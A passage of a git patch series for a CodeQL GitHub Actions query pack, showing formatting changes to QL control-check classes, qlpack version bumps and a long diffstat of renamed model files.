"xt0rted/pull-request-comment-branch", + "alessbell/pull-request-comment-branch", "gotson/pull-request-comment-branch" + ] and // TODO: This should be read step of the head_sha or head_ref output vars this.getArgument("ref").matches("%.head_ref%") or @@ -229,10 +233,10 @@ class GhSHACheckout extends SHACheckoutStep instanceof Run { /** An If node that contains an actor, user or label check */ abstract class ControlCheck extends If { predicate dominates(Step step) { - step.getIf() = this or + step.getIf() = this or step.getEnclosingJob().getIf() = this or - step.getEnclosingJob().getANeededJob().(LocalJob).getAStep().getIf() = this or - step.getEnclosingJob().getANeededJob().(LocalJob).getIf() = this + step.getEnclosingJob().getANeededJob().(LocalJob).getAStep().getIf() = this or + step.getEnclosingJob().getANeededJob().(LocalJob).getIf() = this } } @@ -259,7 +263,7 @@ class ActorControlCheck extends ControlCheck { .regexpFind([ "\\bgithub\\.actor\\b", "\\bgithub\\.triggering_actor\\b", "\\bgithub\\.event\\.comment\\.user\\.login\\b", - "\\bgithub\\.event\\.pull_request\\.user\\.login\\b", + "\\bgithub\\.event\\.pull_request\\.user\\.login\\b", ], _, _) ) } @@ -270,10 +274,7 @@ class RepositoryControlCheck extends ControlCheck { // eg: github.repository == 'test/foo' exists( normalizeExpr(this.getCondition()) - .regexpFind([ - "\\bgithub\\.repository\\b", - "\\bgithub\\.repository_owner\\b", - ], _, _) + .regexpFind(["\\bgithub\\.repository\\b", "\\bgithub\\.repository_owner\\b",], _, _) ) } } From c764b39c1842b433d043bb9c2b974e8abe46861a Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 17 Jun 2024 17:11:10 +0200 Subject: [PATCH 0340/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 33c43429bd6..10d9eeddcf7 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: githubsecuritylab/actions-all -version: 0.1.1 +version: 0.1.2 dependencies: codeql/util: ^1.0.0 codeql/yaml: ^1.0.0 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 75624d6f199..16bad7c15bd 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: githubsecuritylab/actions-queries -version: 0.1.1 +version: 0.1.2 groups: [actions, queries] suites: codeql-suites extractor: javascript From 4619128c11ea18a55b04d9583e80fa16f2d6c66a Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 20 Jun 2024 09:50:36 +0200 Subject: [PATCH 0341/1267] Move from githubsecuritylab packages to github --- .github/action/dist/index.js | 2 +- .github/action/src/codeql.ts | 2 +- ql/lib/ext/8398a7_action-slack.model.yml | 2 +- ql/lib/ext/SonarSource_sonarcloud-github-action.model.yml | 2 +- ql/lib/ext/actions_github-script.model.yml | 2 +- ql/lib/ext/ahmadnassri_action-changed-files.model.yml | 2 +- ql/lib/ext/akhileshns_heroku-deploy.model.yml | 4 ++-- ql/lib/ext/amannn_action-semantic-pull-request.model.yml | 2 +- ql/lib/ext/anchore_sbom-action.model.yml | 2 +- ql/lib/ext/anchore_scan-action.model.yml | 2 +- ql/lib/ext/andresz1_size-limit-action.model.yml | 2 +- ql/lib/ext/android-actions_setup-android.model.yml | 2 +- ql/lib/ext/apple-actions_import-codesign-certs.model.yml | 2 +- ql/lib/ext/asdf-vm_actions.model.yml | 2 +- .../ext/ashley-taylor_read-json-property-action.model.yml | 2 +- ql/lib/ext/ashley-taylor_regex-property-action.model.yml | 2 +- ql/lib/ext/aszc_change-string-case-action.model.yml | 2 +- .../ext/aws-actions_configure-aws-credentials.model.yml | 2 +- ql/lib/ext/axel-op_googlejavaformat-action.model.yml | 2 +- ql/lib/ext/azure_powershell.model.yml | 2 +- ql/lib/ext/bahmutov_npm-install.model.yml | 2 +- ql/lib/ext/blackducksoftware_github-action.model.yml | 2 +- ql/lib/ext/bobheadxi_deployments.model.yml | 2 +- ql/lib/ext/bufbuild_buf-breaking-action.model.yml | 4 ++-- ql/lib/ext/bufbuild_buf-lint-action.model.yml | 4 ++-- ql/lib/ext/bufbuild_buf-setup-action.model.yml | 2 +- ql/lib/ext/cachix_cachix-action.model.yml | 4 ++-- ql/lib/ext/changesets_action.model.yml | 2 +- ql/lib/ext/cloudflare_wrangler-action.model.yml | 2 +- ql/lib/ext/coursier_cache-action.model.yml | 2 +- ql/lib/ext/crazy-max_ghaction-chocolatey.model.yml | 2 +- ql/lib/ext/crazy-max_ghaction-import-gpg.model.yml | 2 +- ql/lib/ext/csexton_release-asset-action.model.yml | 2 +- ql/lib/ext/cycjimmy_semantic-release-action.model.yml | 2 +- ql/lib/ext/cypress-io_github-action.model.yml | 2 +- ql/lib/ext/dailydotdev_action-devcard.model.yml | 2 +- .../danielpalme_reportgenerator-github-action.model.yml | 2 +- ql/lib/ext/daspn_private-actions-checkout.model.yml | 2 +- ql/lib/ext/dawidd6_action-ansible-playbook.model.yml | 2 +- ql/lib/ext/dawidd6_action-download-artifact.model.yml | 2 +- ql/lib/ext/delaguardo_setup-clojure.model.yml | 2 +- .../determinatesystems_magic-nix-cache-action.model.yml | 2 +- ql/lib/ext/docker-practice_actions-setup-docker.model.yml | 2 +- ql/lib/ext/docker_build-push-action.model.yml | 2 +- ql/lib/ext/endbug_latest-tag.model.yml | 2 +- ql/lib/ext/expo_expo-github-action.model.yml | 2 +- .../ext/firebaseextended_action-hosting-deploy.model.yml | 2 +- ql/lib/ext/frabert_replace-string-action.model.yml | 2 +- ql/lib/ext/franzdiebold_github-env-vars-action.model.yml | 2 +- ql/lib/ext/gabrielbb_xvfb-action.model.yml | 2 +- ql/lib/ext/game-ci_unity-builder.model.yml | 2 +- ql/lib/ext/game-ci_unity-test-runner.model.yml | 2 +- ql/lib/ext/gautamkrishnar_blog-post-workflow.model.yml | 2 +- .../actions_actions-runner-controller.model.yml | 2 +- .../ext/generated/composite-actions/adap_flower.model.yml | 2 +- .../composite-actions/agoric_agoric-sdk.model.yml | 2 +- .../composite-actions/airbnb_lottie-ios.model.yml | 2 +- .../composite-actions/airbytehq_airbyte.model.yml | 2 +- .../composite-actions/amazon-ion_ion-java.model.yml | 2 +- .../generated/composite-actions/anchore_grype.model.yml | 2 +- .../generated/composite-actions/anchore_syft.model.yml | 2 +- .../composite-actions/angular_dev-infra.model.yml | 2 +- .../composite-actions/ansible_ansible-lint.model.yml | 2 +- .../ext/generated/composite-actions/ansible_awx.model.yml | 2 +- .../composite-actions/apache_arrow-datafusion.model.yml | 2 +- .../generated/composite-actions/apache_arrow-rs.model.yml | 2 +- .../generated/composite-actions/apache_arrow.model.yml | 2 +- .../composite-actions/apache_bookkeeper.model.yml | 2 +- .../ext/generated/composite-actions/apache_brpc.model.yml | 2 +- .../generated/composite-actions/apache_camel-k.model.yml | 2 +- .../generated/composite-actions/apache_camel.model.yml | 2 +- .../generated/composite-actions/apache_flink.model.yml | 2 +- .../apache_incubator-kie-tools.model.yml | 2 +- .../generated/composite-actions/apache_nuttx.model.yml | 2 +- .../generated/composite-actions/apache_opendal.model.yml | 2 +- .../generated/composite-actions/apache_pekko.model.yml | 2 +- .../composite-actions/apache_pulsar-helm-chart.model.yml | 2 +- .../generated/composite-actions/apache_superset.model.yml | 2 +- .../composite-actions/appflowy-io_appflowy.model.yml | 2 +- .../composite-actions/aptos-labs_aptos-core.model.yml | 2 +- .../archivesspace_archivesspace.model.yml | 2 +- .../composite-actions/armadaproject_armada.model.yml | 2 +- .../generated/composite-actions/armbian_build.model.yml | 2 +- .../composite-actions/auth0_auth0-java.model.yml | 2 +- .../generated/composite-actions/auth0_auth0.net.model.yml | 2 +- .../composite-actions/auth0_auth0.swift.model.yml | 2 +- .../composite-actions/autogluon_autogluon.model.yml | 2 +- .../generated/composite-actions/avaiga_taipy.model.yml | 2 +- .../composite-actions/aws-amplify_amplify-cli.model.yml | 2 +- .../aws-powertools_powertools-lambda-python.model.yml | 2 +- .../composite-actions/aws_amazon-vpc-cni-k8s.model.yml | 2 +- .../aws_karpenter-provider-aws.model.yml | 2 +- .../composite-actions/awslabs_amazon-eks-ami.model.yml | 2 +- .../awslabs_aws-lambda-rust-runtime.model.yml | 2 +- .../azerothcore_azerothcore-wotlk.model.yml | 2 +- .../composite-actions/azure_azure-datafactory.model.yml | 2 +- .../generated/composite-actions/badges_shields.model.yml | 2 +- .../composite-actions/balena-io_etcher.model.yml | 2 +- .../composite-actions/balena-os_balena-engine.model.yml | 2 +- .../composite-actions/ben-manes_caffeine.model.yml | 2 +- .../ext/generated/composite-actions/bokeh_bokeh.model.yml | 2 +- .../composite-actions/botpress_botpress.model.yml | 2 +- .../braintree_braintree-android-drop-in.model.yml | 2 +- .../braintree_braintree_android.model.yml | 2 +- .../composite-actions/broadinstitute_gatk.model.yml | 2 +- .../composite-actions/canonical_multipass.model.yml | 2 +- .../composite-actions/chia-network_actions.model.yml | 2 +- .../chia-network_chia-blockchain.model.yml | 2 +- .../composite-actions/chipsalliance_chisel.model.yml | 2 +- .../composite-actions/chocobozzz_peertube.model.yml | 2 +- .../composite-actions/cilium_cilium-cli.model.yml | 2 +- .../generated/composite-actions/cilium_cilium.model.yml | 2 +- .../generated/composite-actions/citusdata_citus.model.yml | 2 +- .../composite-actions/clerk_javascript.model.yml | 2 +- .../cloud-custodian_cloud-custodian.model.yml | 2 +- .../composite-actions/cloudflare_workers-sdk.model.yml | 2 +- .../cloudfoundry_cloud_controller_ng.model.yml | 2 +- .../ext/generated/composite-actions/coder_coder.model.yml | 2 +- .../generated/composite-actions/coil-kt_coil.model.yml | 2 +- .../composite-actions/commaai_openpilot.model.yml | 2 +- .../conan-io_conan-center-index.model.yml | 2 +- .../composite-actions/corretto_corretto-8.model.yml | 2 +- .../composite-actions/cosmos_cosmos-sdk.model.yml | 2 +- .../generated/composite-actions/coturn_coturn.model.yml | 2 +- .../crunchydata_postgres-operator.model.yml | 2 +- .../ext/generated/composite-actions/cvc5_cvc5.model.yml | 2 +- .../generated/composite-actions/d2l-ai_d2l-en.model.yml | 2 +- .../danysk_build-check-deploy-gradle-action.model.yml | 2 +- .../composite-actions/datadog_dd-trace-dotnet.model.yml | 2 +- .../composite-actions/datadog_dd-trace-go.model.yml | 2 +- .../composite-actions/datadog_dd-trace-js.model.yml | 2 +- .../composite-actions/datafuselabs_databend.model.yml | 2 +- .../generated/composite-actions/davatorium_rofi.model.yml | 2 +- .../composite-actions/debezium_debezium.model.yml | 2 +- .../composite-actions/defenseunicorns_zarf.model.yml | 2 +- ...marches-simplifiees_demarches-simplifiees.fr.model.yml | 2 +- .../department-of-veterans-affairs_vets-website.model.yml | 2 +- .../composite-actions/devexpress_devextreme.model.yml | 2 +- .../generated/composite-actions/diggerhq_digger.model.yml | 2 +- .../generated/composite-actions/diku-dk_futhark.model.yml | 2 +- .../composite-actions/discourse_.github.model.yml | 2 +- .../generated/composite-actions/dnsjava_dnsjava.model.yml | 2 +- .../dotintent_react-native-ble-plx.model.yml | 2 +- .../composite-actions/dotnet_docs-tools.model.yml | 2 +- .../composite-actions/dotnet_dotnet-monitor.model.yml | 2 +- .../composite-actions/dragonflydb_dragonfly.model.yml | 2 +- .../composite-actions/drawpile_drawpile.model.yml | 2 +- .../composite-actions/eksctl-io_eksctl.model.yml | 2 +- .../composite-actions/elastic_apm-agent-dotnet.model.yml | 2 +- .../composite-actions/elastic_apm-agent-java.model.yml | 2 +- .../composite-actions/elastic_apm-server.model copy.yml | 2 +- .../composite-actions/elementor_elementor.model.yml | 2 +- .../generated/composite-actions/emberjs_data.model.yml | 2 +- .../ext/generated/composite-actions/emqx_emqx.model.yml | 2 +- .../composite-actions/eonasdan_tempus-dominus.model.yml | 2 +- .../ext/generated/composite-actions/erlang_otp.model.yml | 2 +- .../generated/composite-actions/esphome_esphome.model.yml | 2 +- .../generated/composite-actions/expensify_app.model.yml | 2 +- .../ext/generated/composite-actions/expo_expo.model.yml | 2 +- .../composite-actions/expo_vscode-expo.model.yml | 2 +- .../external-secrets_external-secrets.model.yml | 2 +- .../generated/composite-actions/facebook_buck2.model.yml | 2 +- .../generated/composite-actions/facebook_flow.model.yml | 2 +- .../generated/composite-actions/facebook_yoga.model.yml | 2 +- .../composite-actions/facebookresearch_xformers.model.yml | 2 +- .../composite-actions/fastly_compute-actions.model.yml | 2 +- .../generated/composite-actions/felangel_bloc.model.yml | 2 +- .../composite-actions/firebase_firebase-ios-sdk.model.yml | 2 +- .../composite-actions/flagsmith_flagsmith.model.yml | 2 +- .../composite-actions/flaxengine_flaxengine.model.yml | 2 +- .../flipperdevices_flipperzero-firmware.model.yml | 2 +- .../generated/composite-actions/fluxcd_flux2.model.yml | 2 +- .../forcedotcom_salesforcedx-vscode.model.yml | 2 +- .../generated/composite-actions/fossasia_visdom.model.yml | 2 +- .../composite-actions/freckle_stack-action.model.yml | 2 +- .../freeradius_freeradius-server.model.yml | 2 +- .../generated/composite-actions/gaphor_gaphor.model.yml | 2 +- .../composite-actions/getsentry_action-release.model.yml | 2 +- .../composite-actions/github_codeql-action.model.yml | 2 +- .../ext/generated/composite-actions/github_ruby.model.yml | 2 +- .../composite-actions/gittools_gitversion.model.yml | 2 +- .../composite-actions/go-spatial_tegola.model.yml | 2 +- .../composite-actions/goauthentik_authentik.model.yml | 2 +- .../composite-actions/godotengine_godot.model.yml | 2 +- .../generated/composite-actions/google_dagger.model.yml | 2 +- .../composite-actions/googleapis_java-cloud-bom.model.yml | 2 +- .../googleapis_sdk-platform-java.model.yml | 2 +- .../googlecloudplatform_dataflowtemplates.model.yml | 4 ++-- .../googlecloudplatform_magic-modules.model.yml | 2 +- .../composite-actions/gravitational_teleport.model.yml | 2 +- .../composite-actions/grote_transportr.model.yml | 2 +- .../generated/composite-actions/hashicorp_nomad.model.yml | 2 +- .../composite-actions/hashicorp_terraform.model.yml | 2 +- .../generated/composite-actions/hashicorp_vault.model.yml | 4 ++-- .../composite-actions/home-assistant_android.model.yml | 2 +- .../composite-actions/homebrew_actions.model.yml | 2 +- .../hyperledger_aries-cloudagent-python.model.yml | 2 +- .../hyperledger_fabric-samples.model.yml | 2 +- .../composite-actions/igniterealtime_openfire.model.yml | 2 +- .../composite-actions/infracost_actions.model.yml | 2 +- .../inspektor-gadget_inspektor-gadget.model.yml | 2 +- .../composite-actions/intel-analytics_ipex-llm.model.yml | 2 +- .../ionic-team_ionic-framework.model.yml | 2 +- .../composite-actions/ionic-team_ionicons.model.yml | 2 +- .../composite-actions/ionic-team_stencil.model.yml | 2 +- .../ext/generated/composite-actions/ipfs_aegir.model.yml | 2 +- .../jetbrains_jetbrainsruntime.model.yml | 2 +- .../jhipster_generator-jhipster.model.yml | 4 ++-- .../composite-actions/jsocol_django-ratelimit.model.yml | 2 +- .../composite-actions/juicedata_juicefs.model.yml | 2 +- .../composite-actions/jupyter_docker-stacks.model.yml | 2 +- .../composite-actions/keycloak_keycloak.model.yml | 2 +- .../generated/composite-actions/kserve_kserve.model.yml | 2 +- .../generated/composite-actions/kubeflow_katib.model.yml | 2 +- .../kubeflow_training-operator.model.yml | 2 +- .../composite-actions/kubernetes-sigs_karpenter.model.yml | 2 +- .../composite-actions/kubernetes-sigs_kwok.model.yml | 2 +- .../composite-actions/kubescape_kubescape.model.yml | 2 +- .../composite-actions/kubeshop_botkube.model.yml | 2 +- .../generated/composite-actions/kyverno_kyverno.model.yml | 2 +- .../generated/composite-actions/lancedb_lance.model.yml | 2 +- .../launchdarkly_ios-client-sdk.model.yml | 2 +- .../layer5labs_meshmap-snapshot.model.yml | 2 +- .../composite-actions/ldc-developers_ldc.model.yml | 2 +- .../composite-actions/ledgerhq_ledger-live.model.yml | 2 +- .../ext/generated/composite-actions/lerna_lerna.model.yml | 2 +- .../ext/generated/composite-actions/lf-edge_eve.model.yml | 2 +- .../generated/composite-actions/libgit2_libgit2.model.yml | 2 +- .../lightning-ai_pytorch-lightning.model.yml | 2 +- .../composite-actions/lightning-ai_torchmetrics.model.yml | 2 +- .../composite-actions/linkerd_linkerd2.model.yml | 4 ++-- .../composite-actions/logseq_publish-spa.model.yml | 2 +- .../composite-actions/macvim-dev_macvim.model.yml | 2 +- .../generated/composite-actions/mamba-org_mamba.model.yml | 2 +- .../composite-actions/maplibre_maplibre-native.model.yml | 2 +- .../composite-actions/mastodon_mastodon.model.yml | 2 +- .../composite-actions/mavlink_qgroundcontrol.model.yml | 2 +- .../composite-actions/mdanalysis_mdanalysis.model.yml | 2 +- .../generated/composite-actions/medic_cht-core.model.yml | 2 +- .../generated/composite-actions/medusajs_medusa.model.yml | 2 +- .../composite-actions/metabase_metabase.model.yml | 2 +- .../metamask_action-create-release-pr.model.yml | 2 +- .../metamask_action-npm-publish.model.yml | 2 +- .../composite-actions/microsoft_fluentui.model.yml | 2 +- .../composite-actions/microsoft_playwright.model.yml | 2 +- .../generated/composite-actions/microsoft_wsl.model.yml | 2 +- .../composite-actions/milvus-io_milvus.model.yml | 2 +- .../generated/composite-actions/mlflow_mlflow.model.yml | 2 +- .../composite-actions/modin-project_modin.model.yml | 2 +- .../composite-actions/mozilla_addons-server.model.yml | 2 +- .../generated/composite-actions/mozilla_bedrock.model.yml | 2 +- .../generated/composite-actions/mozilla_sccache.model.yml | 2 +- .../composite-actions/msys2_setup-msys2.model.yml | 2 +- .../composite-actions/mumble-voip_mumble.model.yml | 2 +- .../ext/generated/composite-actions/nasa_fprime.model.yml | 2 +- .../composite-actions/nats-io_nats-server.model.yml | 2 +- ...form-actions_optic-release-automation-action.model.yml | 2 +- .../ext/generated/composite-actions/nektos_act.model.yml | 2 +- .../neo4j-contrib_neo4j-apoc-procedures.model.yml | 2 +- .../composite-actions/neondatabase_neon.model.yml | 2 +- .../generated/composite-actions/neovim_neovim.model.yml | 2 +- .../ext/generated/composite-actions/nhost_nhost.model.yml | 2 +- .../composite-actions/nix-community_nixos-wsl.model.yml | 2 +- .../ext/generated/composite-actions/novuhq_novu.model.yml | 4 ++-- .../ext/generated/composite-actions/nymtech_nym.model.yml | 2 +- .../composite-actions/obsproject_obs-studio.model.yml | 2 +- .../ext/generated/composite-actions/ocaml_dune.model.yml | 2 +- .../composite-actions/oneflow-inc_oneflow.model.yml | 2 +- .../open-telemetry_opentelemetry-ruby-contrib.model.yml | 2 +- .../open-telemetry_opentelemetry-ruby.model.yml | 2 +- .../open-watcom_open-watcom-v2.model.yml | 2 +- .../openapitools_openapi-generator.model.yml | 2 +- .../ext/generated/composite-actions/openjdk_jdk.model.yml | 2 +- .../opensearch-project_opensearch-net.model.yml | 2 +- .../opensearch-project_security.model.yml | 2 +- .../composite-actions/opentrons_opentrons.model.yml | 2 +- .../composite-actions/openvinotoolkit_openvino.model.yml | 2 +- ...nzeppelin_openzeppelin-contracts-upgradeable.model.yml | 2 +- .../openzeppelin_openzeppelin-contracts.model.yml | 2 +- .../ext/generated/composite-actions/oppia_oppia.model.yml | 2 +- .../generated/composite-actions/oracle_graal.model.yml | 2 +- .../composite-actions/oracle_truffleruby.model.yml | 2 +- .../generated/composite-actions/orhun_git-cliff.model.yml | 2 +- .../ext/generated/composite-actions/oven-sh_bun.model.yml | 2 +- .../composite-actions/owntracks_android.model.yml | 2 +- .../composite-actions/pandas-dev_pandas.model.yml | 2 +- .../composite-actions/pardeike_harmony.model.yml | 2 +- .../composite-actions/pennylaneai_pennylane.model.yml | 2 +- .../composite-actions/phalcon_cphalcon.model.yml | 2 +- .../philosowaffle_peloton-to-garmin.model.yml | 4 ++-- .../ext/generated/composite-actions/php_php-src.model.yml | 2 +- .../phpdocumentor_phpdocumentor.model.yml | 2 +- .../pinecone-io_pinecone-python-client.model.yml | 2 +- .../generated/composite-actions/pixijs_pixijs.model.yml | 2 +- .../generated/composite-actions/posthog_posthog.model.yml | 2 +- .../generated/composite-actions/primer_react.model.yml | 2 +- .../project-chip_connectedhomeip.model.yml | 2 +- .../composite-actions/projectnessie_nessie.model.yml | 2 +- .../ext/generated/composite-actions/psf_black.model.yml | 2 +- .../composite-actions/pyca_cryptography.model.yml | 2 +- .../pyg-team_pytorch_geometric.model.yml | 2 +- .../composite-actions/python-poetry_poetry.model.yml | 2 +- .../ext/generated/composite-actions/python_mypy.model.yml | 2 +- .../composite-actions/quarto-dev_quarto-cli.model.yml | 2 +- .../ext/generated/composite-actions/quay_clair.model.yml | 2 +- .../composite-actions/quickwit-oss_quickwit.model.yml | 2 +- .../generated/composite-actions/r-lib_actions.model.yml | 2 +- .../generated/composite-actions/randombit_botan.model.yml | 2 +- .../composite-actions/raspberrypi_documentation.model.yml | 2 +- .../composite-actions/ray-project_kuberay.model.yml | 2 +- .../composite-actions/readthedocs_actions.model.yml | 2 +- .../composite-actions/reflex-dev_reflex.model.yml | 2 +- .../composite-actions/renovatebot_renovate.model.yml | 2 +- .../composite-actions/rethinkdb_rethinkdb.model.yml | 2 +- .../ext/generated/composite-actions/risc0_risc0.model.yml | 2 +- .../composite-actions/rocketchat_rocket.chat.model.yml | 2 +- .../ext/generated/composite-actions/rook_rook.model.yml | 2 +- .../generated/composite-actions/roots_trellis.model.yml | 2 +- .../ext/generated/composite-actions/ruby_debug.model.yml | 2 +- .../ext/generated/composite-actions/ruby_ruby.model.yml | 2 +- .../generated/composite-actions/rusefi_rusefi.model.yml | 2 +- .../generated/composite-actions/saltstack_salt.model.yml | 2 +- ql/lib/ext/generated/composite-actions/saltstack_salt.yml | 2 +- .../generated/composite-actions/sap_sapmachine.model.yml | 2 +- .../composite-actions/scala-native_scala-native.model.yml | 2 +- .../generated/composite-actions/scitools_iris.model.yml | 2 +- .../composite-actions/scylladb_scylla-operator.model.yml | 2 +- .../composite-actions/shader-slang_slang.model.yml | 2 +- .../shaka-project_shaka-player.model.yml | 2 +- .../shakacode_react-webpack-rails-tutorial.model.yml | 2 +- .../composite-actions/simple-icons_simple-icons.model.yml | 2 +- .../generated/composite-actions/slint-ui_slint.model.yml | 2 +- .../composite-actions/solidusio_solidus.model.yml | 2 +- .../generated/composite-actions/solo-io_gloo.model.yml | 2 +- .../generated/composite-actions/sonarr_sonarr.model.yml | 2 +- .../composite-actions/sonic-pi-net_sonic-pi.model.yml | 2 +- .../composite-actions/spacedriveapp_spacedrive.model.yml | 2 +- .../composite-actions/spockframework_spock.model.yml | 2 +- .../composite-actions/spring-io_initializr.model.yml | 2 +- .../composite-actions/spring-io_start.spring.io.model.yml | 2 +- .../spring-projects_spring-boot.model.yml | 2 +- .../spring-projects_spring-framework.model.yml | 2 +- .../spring-projects_spring-graphql.model.yml | 2 +- .../composite-actions/square_workflow-kotlin.model.yml | 2 +- .../composite-actions/stefanprodan_podinfo.model.yml | 2 +- .../ext/generated/composite-actions/stellar_go.model.yml | 2 +- .../composite-actions/streetsidesoftware_cspell.model.yml | 4 ++-- .../generated/composite-actions/subquery_subql.model.yml | 2 +- .../swagger-api_swagger-codegen.model.yml | 2 +- .../swagger-api_swagger-parser.model.yml | 2 +- .../composite-actions/tarantool_tarantool.model.yml | 2 +- .../telepresenceio_telepresence.model.yml | 2 +- .../composite-actions/tensorflow_datasets.model.yml | 2 +- .../composite-actions/texstudio-org_texstudio.model.yml | 2 +- .../composite-actions/toeverything_affine.model.yml | 2 +- .../composite-actions/treeverse_lakefs.model.yml | 2 +- .../composite-actions/trezor_trezor-firmware.model.yml | 2 +- .../generated/composite-actions/tribler_tribler.model.yml | 2 +- .../composite-actions/trunk-io_trunk-action.model.yml | 2 +- .../generated/composite-actions/unidata_metpy.model.yml | 2 +- .../unstructured-io_unstructured.model.yml | 2 +- .../generated/composite-actions/vercel_turbo.model.yml | 2 +- .../composite-actions/vesoft-inc_nebula.model.yml | 2 +- .../ext/generated/composite-actions/vkcom_vkui.model.yml | 2 +- .../composite-actions/vuetifyjs_vuetify.model.yml | 2 +- .../generated/composite-actions/wagoodman_dive.model.yml | 2 +- .../walletconnect_walletconnectswiftv2.model.yml | 2 +- .../ext/generated/composite-actions/wazuh_wazuh.model.yml | 2 +- .../composite-actions/web-infra-dev_rspack.model.yml | 2 +- .../composite-actions/webassembly_wabt.model.yml | 2 +- .../ext/generated/composite-actions/wntrblm_nox.model.yml | 2 +- .../generated/composite-actions/xrplf_rippled.model.yml | 2 +- .../ext/generated/composite-actions/zcash_zcash.model.yml | 2 +- .../generated/composite-actions/zenml-io_zenml.model.yml | 2 +- .../generated/composite-actions/zeroc-ice_ice.model.yml | 2 +- .../reusable-workflows/0xpolygon_polygon-edge.model.yml | 2 +- .../ext/generated/reusable-workflows/8vim_8vim.model.yml | 2 +- .../actions_reusable-workflows.model.yml | 2 +- .../generated/reusable-workflows/adap_flower.model.yml | 2 +- .../reusable-workflows/aio-libs_multidict.model.yml | 2 +- .../generated/reusable-workflows/aio-libs_yarl.model.yml | 2 +- .../reusable-workflows/airbytehq_airbyte.model.yml | 2 +- .../reusable-workflows/alphagov_collections.model.yml | 2 +- .../reusable-workflows/alphagov_frontend.model.yml | 2 +- .../reusable-workflows/alphagov_publishing-api.model.yml | 2 +- .../generated/reusable-workflows/apache_druid.model.yml | 2 +- .../generated/reusable-workflows/apache_flink.model.yml | 2 +- .../generated/reusable-workflows/apache_spark.model.yml | 2 +- .../reusable-workflows/argilla-io_argilla.model.yml | 2 +- .../reusable-workflows/argoproj_argo-cd.model.yml | 2 +- .../reusable-workflows/argoproj_argo-rollouts.model.yml | 2 +- .../reusable-workflows/aws-amplify_amplify-ui.model.yml | 2 +- .../generated/reusable-workflows/azure_apiops.model.yml | 2 +- .../reusable-workflows/azure_mlops-templates.model.yml | 2 +- .../reusable-workflows/bbq-beets_avocaddo-cmw.model.yml | 2 +- .../reusable-workflows/bbq-beets_mobile-ci-cd.model.yml | 2 +- .../bbq-beets_yujincat-action.model.yml | 2 +- .../bdunderscore_modular-avatar.model.yml | 2 +- .../benc-uk_workflow-dispatch.model.yml | 2 +- .../reusable-workflows/bridgecrewio_checkov.model.yml | 2 +- .../reusable-workflows/bugsnag_bugsnag-ruby.model.yml | 2 +- .../bytecodealliance_wasm-micro-runtime.model.yml | 2 +- .../reusable-workflows/celo-org_celo-blockchain.model.yml | 2 +- .../reusable-workflows/cemu-project_cemu.model.yml | 2 +- .../reusable-workflows/cesiumgs_cesium-unreal.model.yml | 2 +- .../ext/generated/reusable-workflows/cgal_cgal.model.yml | 2 +- .../reusable-workflows/checkstyle_checkstyle.model.yml | 2 +- .../reusable-workflows/chia-network_actions.model.yml | 2 +- .../reusable-workflows/chipsalliance_chisel.model.yml | 2 +- .../reusable-workflows/clickhouse_clickhouse.model.yml | 2 +- .../reusable-workflows/cloudfoundry_cli.model.yml | 2 +- ...loudposse_github-action-matrix-outputs-write.model.yml | 2 +- .../generated/reusable-workflows/cocotb_cocotb.model.yml | 2 +- .../codeigniter4_codeigniter4.model.yml | 2 +- .../reusable-workflows/com-lihaoyi_mill.model.yml | 2 +- .../generated/reusable-workflows/cosmos_ibc-go.model.yml | 2 +- .../reusable-workflows/crowdsecurity_crowdsec.model.yml | 2 +- .../reusable-workflows/cryptomator_cryptomator.model.yml | 2 +- .../reusable-workflows/daeuniverse_dae.model.yml | 2 +- .../reusable-workflows/dafny-lang_dafny.model.yml | 2 +- .../generated/reusable-workflows/dagger_dagger.model.yml | 2 +- .../dash-industry-forum_dash.js.model.yml | 2 +- .../reusable-workflows/datadog_dd-trace-go.model.yml | 2 +- .../reusable-workflows/datadog_dd-trace-py.model.yml | 2 +- .../reusable-workflows/datafuselabs_databend.model.yml | 2 +- .../reusable-workflows/dbt-labs_dbt-bigquery.model.yml | 2 +- .../reusable-workflows/dbt-labs_dbt-core.model.yml | 2 +- .../reusable-workflows/dbt-labs_dbt-snowflake.model.yml | 2 +- .../reusable-workflows/decidim_decidim.model.yml | 2 +- .../defectdojo_django-defectdojo.model.yml | 2 +- .../dependencytrack_dependency-track.model.yml | 2 +- .../reusable-workflows/devexpress_testcafe.model.yml | 2 +- .../generated/reusable-workflows/dfhack_dfhack.model.yml | 2 +- .../reusable-workflows/docker_build-push-action.model.yml | 2 +- .../dragonwell-project_dragonwell11.model.yml | 2 +- .../reusable-workflows/earthly_earthly.model.yml | 2 +- .../reusable-workflows/eclipse-vertx_vert.x.model.yml | 2 +- .../eclipse-vertx_vertx-sql-client.model.yml | 2 +- .../elastic_elasticsearch-net.model.yml | 2 +- .../element-hq_element-desktop.model.yml | 4 ++-- .../reusable-workflows/envoyproxy_envoy.model.yml | 2 +- .../generated/reusable-workflows/etcd-io_bbolt.model.yml | 2 +- .../generated/reusable-workflows/etcd-io_etcd.model.yml | 2 +- .../reusable-workflows/eventstore_eventstore.model.yml | 2 +- .../generated/reusable-workflows/expensify_app.model.yml | 2 +- .../external-secrets_external-secrets.model.yml | 2 +- .../facebook_create-react-app.model.yml | 2 +- .../facebookresearch_xformers.model.yml | 2 +- .../reusable-workflows/falcosecurity_falco.model.yml | 2 +- .../reusable-workflows/fastify_fastify.model.yml | 2 +- .../reusable-workflows/ferretdb_ferretdb.model.yml | 2 +- .../reusable-workflows/filecoin-project_venus.model.yml | 2 +- .../firebase_firebase-unity-sdk.model.yml | 2 +- .../reusable-workflows/flarum_framework.model.yml | 2 +- .../reusable-workflows/fluent_fluent-bit.model.yml | 2 +- .../reusable-workflows/flux-iac_tofu-controller.model.yml | 2 +- .../generated/reusable-workflows/flyteorg_flyte.model.yml | 2 +- .../reusable-workflows/foundatiofx_foundatio.model.yml | 2 +- .../reusable-workflows/freecad_freecad.model.yml | 2 +- .../reusable-workflows/getpelican_pelican.model.yml | 2 +- 